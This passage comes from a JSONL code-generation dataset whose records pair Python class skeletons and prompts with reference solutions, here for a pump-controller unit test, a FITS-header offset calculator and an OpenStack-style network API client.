self.decider)\n<|end_body_0|>\n\n<|body_start_1|>\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n<|end_body_1|>\n", "revision_id": "b1fea0309b3495b3e1dc167d7029bc9e4b6f00f1", "skeleton": "<|skeleton|>\nclass ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n <|body_0|>\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": 
"stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, self.decider)\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n", "source": "the_stack_v2_python_sparse", "source_path": "students/wwhite/Lesson06/water-regulation/waterregulation/test.py", "source_repo": "UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018", "split": "test", "star_events_count": 4} {"blob_id": "f48c8bed0752f6a8c52f88ff97e588ac951420da", "bodies": ["Offsets.__init__(self, **kwargs)\nself.center = center\nself.target = target", "target = [image.header[x] for x in self.target]\ncenter = [image.header[x] for x in self.center]\nimage.meta['offsets'] = np.subtract(target, center)\nreturn image"], "bodies_text": "<|body_start_0|>\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n<|end_body_0|>\n\n<|body_start_1|>\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n<|end_body_1|>\n", "class_docstring": "An offset-calculation method based on fits headers.", "class_name": "FitsHeaderOffsets", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n <|body_0|>\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n<|end_body_0|>\n\n<|body_start_1|>\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000257", "length_bytes": 1149, "license_type": "permissive", "methods": [{"docstring": "Initializes new fits header offsets.", "name": "__init__", "signature": "def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any)"}, {"docstring": "Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. 
Raises: ValueError: If offset could not be found.", "name": "__call__", "signature": "async def __call__(self, image: Image) -> Image"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000405", "prompt": "Implement the Python class `FitsHeaderOffsets` described below.\n\nClass description:\nAn offset-calculation method based on fits headers.\n\nMethod signatures and docstrings:\n- def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any): Initializes new fits header offsets.\n- async def __call__(self, image: Image) -> Image: Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.", "prompted_full_text": "Implement the Python class `FitsHeaderOffsets` described below.\n\nClass description:\nAn offset-calculation method based on fits headers.\n\nMethod signatures and docstrings:\n- def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any): Initializes new fits header offsets.\n- async def __call__(self, image: Image) -> Image: Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\n\n<|skeleton|>\nclass FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n <|body_0|>\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n<|end_body_0|>\n\n<|body_start_1|>\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n<|end_body_1|>\n", "revision_id": "2d7a06e5485b61b6ca7e51d99b08651ea6021086", "skeleton": "<|skeleton|>\nclass FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n <|body_0|>\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. 
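The offset logic in `FitsHeaderOffsets.__call__` reduces to an element-wise subtraction of two header-keyword pairs. A standalone sketch with a plain dict standing in for the FITS header (the center keywords are the class defaults; the target keywords are invented for the demo):

import numpy as np

header = {'DET-CPX1': 512.0, 'DET-CPX2': 512.0,   # chip center (class default keywords)
          'TARG-X': 530.5, 'TARG-Y': 498.0}       # hypothetical target keywords

target_keys = ('TARG-X', 'TARG-Y')
center_keys = ('DET-CPX1', 'DET-CPX2')

target = [header[k] for k in target_keys]
center = [header[k] for k in center_keys]
offsets = np.subtract(target, center)   # x/y pixel offset, target minus center
print(offsets)  # [ 18.5 -14. ]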
Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n", "source": "the_stack_v2_python_sparse", "source_path": "pyobs/images/processors/offsets/fitsheader.py", "source_repo": "pyobs/pyobs-core", "split": "test", "star_events_count": 9} {"blob_id": "fcf047a85d18a87216609c25a5b9e306797de300", "bodies": ["super(NetworksClient, self).__init__(serialize_format, deserialize_format)\nself.auth_token = auth_token\nself.default_headers['X-Auth-Token'] = auth_token\nct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\naccept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\nself.default_headers['Content-Type'] = ct\nself.default_headers['Accept'] = accept\nif tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\nself.url = url", "url = '{base_url}/networks'.format(base_url=self.url)\nrequest = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\nresp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\nrequest = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\nresp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\nresp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\nurl = '{base_url}/networks'.format(base_url=self.url)\nresp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\nresp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\nreturn resp"], "bodies_text": "<|body_start_0|>\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n<|end_body_0|>\n\n<|body_start_1|>\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_1|>\n\n<|body_start_2|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, 
network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_2|>\n\n<|body_start_3|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_3|>\n\n<|body_start_4|>\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_4|>\n\n<|body_start_5|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_5|>\n", "class_docstring": "", "class_name": "NetworksClient", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NetworksClient:\n\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n <|body_0|>\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n <|body_1|>\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. 
(CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n <|body_2|>\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n <|body_3|>\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n <|body_4|>\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n<|end_body_0|>\n\n<|body_start_1|>\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_1|>\n\n<|body_start_2|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_2|>\n\n<|body_start_3|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_3|>\n\n<|body_start_4|>\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, 
requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_4|>\n\n<|body_start_5|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000258", "length_bytes": 7935, "license_type": "permissive", "methods": [{"docstring": "@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string", "name": "__init__", "signature": "def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None)"}, {"docstring": "@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response", "name": "create_network", "signature": "def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None)"}, {"docstring": "@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. 
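`list_networks` builds a `params` dict in which every unset filter stays `None`. Assuming the cloudcafe base client ultimately hands that dict to `requests` unchanged (the base class is not shown in this record), the `None`-valued keys are simply dropped from the query string, a behavior `requests` documents explicitly. A quick offline check:

import requests

# None-valued filters never reach the wire: requests omits them when
# encoding params. prepare() builds the URL without sending anything.
params = {'name': 'net1', 'status': None, 'shared': None, 'limit': 2}
prepared = requests.Request('GET', 'http://example.com/networks', params=params).prepare()
print(prepared.url)  # http://example.com/networks?name=net1&limit=2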
(CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response", "name": "update_network", "signature": "def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None)"}, {"docstring": "@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response", "name": "get_network", "signature": "def get_network(self, network_id, requestslib_kwargs=None)"}, {"docstring": "@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li", "name": "list_networks", "signature": "def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None)"}, {"docstring": "@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response", "name": "delete_network", "signature": "def delete_network(self, network_id, requestslib_kwargs=None)"}], "n_methods": 6, "prompt": "Implement the Python class `NetworksClient` described below.\n\nClass description:\nImplement the NetworksClient class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None): @param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\n- def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\n- def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. 
(CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\n- def get_network(self, network_id, requestslib_kwargs=None): @summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\n- def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None): @summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\n- def delete_network(self, network_id, requestslib_kwargs=None): @summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response", "prompted_full_text": "Implement the Python class `NetworksClient` described below.\n\nClass description:\nImplement the NetworksClient class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None): @param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\n- def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. 
(CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\n- def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\n- def get_network(self, network_id, requestslib_kwargs=None): @summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\n- def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None): @summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\n- def delete_network(self, network_id, requestslib_kwargs=None): @summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\n\n<|skeleton|>\nclass NetworksClient:\n\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n <|body_0|>\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. 
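The `limit`/`marker`/`page_reverse` parameters on `list_networks` are the usual marker-pagination knobs. A generic client-side paging loop over such an API, runnable against a stub here; the `id` attribute on page items is an assumption, since the real cloudcafe `Networks` response model is not shown in this record:

from types import SimpleNamespace

def list_all_networks(list_page, limit=100):
    # Generic marker pagination: fetch `limit` items, resume from the id of
    # the last item, stop on a short page. `list_page` stands in for
    # NetworksClient.list_networks.
    items, marker = [], None
    while True:
        page = list_page(limit=limit, marker=marker)
        items.extend(page)
        if len(page) < limit:
            return items
        marker = page[-1].id

fake_store = [SimpleNamespace(id=str(i)) for i in range(5)]

def fake_list_page(limit, marker):
    start = 0 if marker is None else next(i for i, n in enumerate(fake_store) if n.id == marker) + 1
    return fake_store[start:start + limit]

print([n.id for n in list_all_networks(fake_list_page, limit=2)])  # ['0', '1', '2', '3', '4']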
(CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n <|body_1|>\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n <|body_2|>\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n <|body_3|>\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n <|body_4|>\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n<|end_body_0|>\n\n<|body_start_1|>\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_1|>\n\n<|body_start_2|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, 
